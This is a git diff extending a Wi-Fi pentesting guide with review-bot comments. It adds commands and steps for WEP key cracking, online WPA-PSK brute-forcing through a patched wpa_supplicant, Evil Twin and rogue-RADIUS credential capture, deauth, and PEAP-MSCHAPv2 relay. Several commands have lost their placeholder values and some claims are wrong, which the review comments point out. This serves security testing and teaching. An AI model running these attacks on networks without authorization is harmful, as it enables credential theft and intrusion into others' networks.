diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 3320e44ede3..9cf7c7f0402 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically: - **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks - **+ WPA** -- Useful to capture WPA handshakes +## Open / OWE networks quick notes + +- **Passive capture** on open SSIDs still works with monitor mode and tcpdump: + +```bash +iw wlan0 set type monitor +ip link set wlan0 up +iw wlan0 set channel 6 +tcpdump -i wlan0 -w capture.pcap +``` + +- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames. +- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works. +- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained. +- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See: + +{{#ref}} +../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +{{#endref}} + ## DOS ### Deauthentication Packets 
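Review bot: in the monitor-mode snippet of the Open / OWE hunk, `iw wlan0 set type monitor` is issued while the interface is still up, which `iw` rejects with "Device or resource busy" on most drivers; insert `ip link set wlan0 down` before it and keep the existing `ip link set wlan0 up` after the type change. Separately, the fenced block sits between two `-` bullets with no indentation, so Markdown closes the list after "Passive capture" and the OWE/Evil Twin bullets render as a second list; either indent the fence under the first bullet or end that bullet with a colon and place the code after the list. The OWE bullets could also say in one clause what the defensive takeaway is (OWE protects against passive sniffing only; L2 isolation and PMF are the controls that matter), since that is the point the "verify client isolation" sentence is making.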
@@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_ ## **WEP** -So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options. +**Why it collapses** + +- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream. +- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions. +- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs. + +Practical break is deterministic: + +```bash +airodump-ng --bssid --channel --write wep_capture wlan1mon # collect IVs +# optionally speed up IVs without deauth by replaying ARP +aireplay-ng --arpreplay -b -h wlan1mon +aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met +``` + +Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI. ![](<../../images/image (432).png>) 
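Review bot: the `airodump-ng` and `aireplay-ng` lines in the WEP hunk have lost their placeholder values: `--bssid --channel --write wep_capture wlan1mon` makes `--channel` the argument of `--bssid`, and `-b -h wlan1mon` leaves `-b` and `-h` without values (angle-bracket placeholders are swallowed as HTML tags when the .md renders). Use bracket-free placeholders that survive rendering, e.g. `airodump-ng --bssid AP_BSSID --channel CH --write wep_capture wlan1mon` and `aireplay-ng --arpreplay -b AP_BSSID -h CLIENT_MAC wlan1mon`, and document that `-h` must be a MAC the AP already accepts (an associated client). "Practical break is deterministic" overstates PTW, which is a statistical key-byte vote that succeeds with high probability once enough IVs are collected; "reliable" is the accurate word, and the sentence should keep the IV count the bullets above give (tens of thousands).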
@@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali pyrit -r psk-01.cap analyze ``` +#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID) + +When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants: + +- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer. +- Run a single daemon with a control socket: + +```bash +# wpa_supplicant.conf +ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root +update_config=1 + +wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf +``` + +- Drive it via the control interface, reusing the same scan and network: + +```text +ADD_NETWORK +SET_NETWORK 0 ssid "" +ENABLE_NETWORK 0 +SCAN +(loop) + SET_NETWORK 0 psk "" + REASSOCIATE + wait for CTRL-EVENT-CONNECTED / DISCONNECTED +``` + +A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays. + ## **WPA Enterprise (MGT)** In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include: 
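Review bot: the control-interface script in the `wpa_supplicant` hunk hardcodes network id 0, but `ADD_NETWORK` returns the id it allocated, and with `update_config=1` saving networks to the config it will not stay 0; capture the returned id and use it in the `SET_NETWORK` and `ENABLE_NETWORK` calls. `SET_NETWORK 0 ssid ""` and `SET_NETWORK 0 psk ""` have empty quoted values where the SSID and candidate-passphrase placeholders were lost; also a quoted `psk` must be 8 to 63 characters or `SET_NETWORK` answers `FAIL`, so the loop has to check that reply rather than only waiting for `CTRL-EVENT-CONNECTED`/`DISCONNECTED`. The "patch `wpa_supplicant.c`" bullet should name the function being modified (`wpas_auth_failed()`, where `dur` is derived from `ssid->auth_failures`) so the change is reproducible across versions. For the "noisy and detectable" remark, state what the noise is: every `REASSOCIATE` with a wrong PSK produces an association followed by a failed 4-way handshake, which APs and WIDS log as per-client EAPOL/auth failures, so ~100 failures from one MAC in five minutes is a straightforward alerting threshold.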
@@ -714,6 +779,16 @@ Or you could also use: - `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect). - [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/) +#### When clients skip RADIUS certificate validation (PEAP/TTLS) + +- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth `) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth. +- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext. + +#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana) + +- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password. +- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations. + **Using Airgeddon** `Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\ 
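Review bot: both new PEAP/TTLS bullets call the MSCHAPv2 challenge/response captured by the rogue RADIUS "NetNTLMv2", but MSCHAPv2 is a DES-based NT-hash response structurally equivalent to NetNTLMv1, and hostapd-mana/eaphammer emit it in hashcat's 5500 (NetNTLMv1) format, not 5600; correct "collect **NetNTLMv2**" and "Cracked NetNTLMv2 gives reusable ..." so readers use the right mode and understand it is the weaker format. The `eaphammer --cert-wizard --creds --auth wpa-eap` one-liner omits the `--interface`, `--essid` and `--channel` arguments that the project's documented `--creds` invocation passes, and `--cert-wizard` is shown there as a separate setup step. `wifi.deauth ` has an empty argument where the BSSID placeholder was lost. Since the heading is "When clients skip RADIUS certificate validation", one sentence naming the control that closes the whole section (enforced server-certificate validation with a pinned CA and server name, or EAP-TLS) would make the risk statement complete.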
@@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti - [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/) - [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186) - [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/) +- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html) +- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/) TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
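Review bot: the two references appended to the list are not cited from the sections they support; at minimum the SensePost post should be linked from the `wpa_sycophant` relay bullet, which names the tool, and the Synacktiv post from whichever of the new OWE, WEP, wpa_supplicant-ctrl and PEAP sections draws on it, so a reader can check the original write-up for the claims (PMF behaviour, IV thresholds, ~100 guesses in ~5 minutes) that the new text states without attribution.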